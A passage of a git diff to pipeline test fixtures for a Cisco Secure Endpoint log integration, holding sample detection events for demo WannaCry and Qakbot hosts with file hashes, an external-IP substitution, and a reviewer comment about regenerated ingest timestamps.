Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":50000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":596000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769885","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204910251770000,"timestamp":1610629579,"timestamp_nanoseconds":34000000,"date":"2021-01-14T13:06:19+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204910251769881","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":941000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802584","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":894000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802583","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802582","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802581","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":644000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Ransom:Gen.20gl.1201","detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"u.wnry","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\u.wnry","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25","sha1":"45356a9dd616ed7161a3b9192e2f318d0ab5ad10","md5":"7bf2b57f2a205768755c07f238fb32cc"},"parent":{"process_id":4688,"disposition":"Malicious","file_name":"tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":286000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419204905956802580","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204905956803000,"timestamp":1610629578,"timestamp_nanoseconds":800000000,"date":"2021-01-14T13:06:18+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419204905956802579","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":802000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204901661835277","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419204901661835000,"timestamp":1610629577,"timestamp_nanoseconds":646000000,"date":"2021-01-14T13:06:17+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419204897366867976","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}}
\ No newline at end of file
diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json
index 532974c5229..84d6a848011 100644
--- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json
+++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp6.log-expected.json
@@ -18,7 +18,7 @@
 "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 ],
 "ip": [
- "8.8.8.8",
+ "81.2.69.144",
 "10.10.10.10"
 ]
 },
@@ -28,8 +28,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103711441Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461437500Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847664\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -49,7 +49,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -94,7 +94,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
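Review bot: The `event.ingested` values rewritten in the `@@ -28,8 +28,8 @@` hunk (`2021-09-30T00:15:28.103711441Z` → `2021-12-09T13:35:51.461437500Z`) are wall-clock timestamps captured when the expected file was regenerated, so they change on every regeneration and bury the intended edit (`external_ip` 8.8.8.8 → 81.2.69.144 inside `event.original`) in unrelated noise. The same churn repeats in each of the later `-NN,8 +NN,8` hunks of this file. If the pipeline test harness supports marking a field as dynamic (I believe elastic-package reads a `dynamic_fields` map from the per-test config, but that file is not in this diff), registering `event.ingested` there would make these expected fixtures stable; otherwise consider leaving the `ingested` lines untouched when only sample data changes, since asserting on a regeneration time carries no information about the pipeline. Treat the exact mechanism as something to confirm against the harness rather than as established by this diff.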
@@ -104,8 +104,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103716854Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461446400Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847663\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -125,7 +125,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -170,7 +170,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -180,8 +180,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103719085Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461470300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847662\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -201,7 +201,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -246,7 +246,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -256,8 +256,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103721187Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419229331435815000,\"timestamp\":1610635265,\"timestamp_nanoseconds\":166000000,\"date\":\"2021-01-14T14:41:05+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419229327140847661\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461478400Z", + "original": 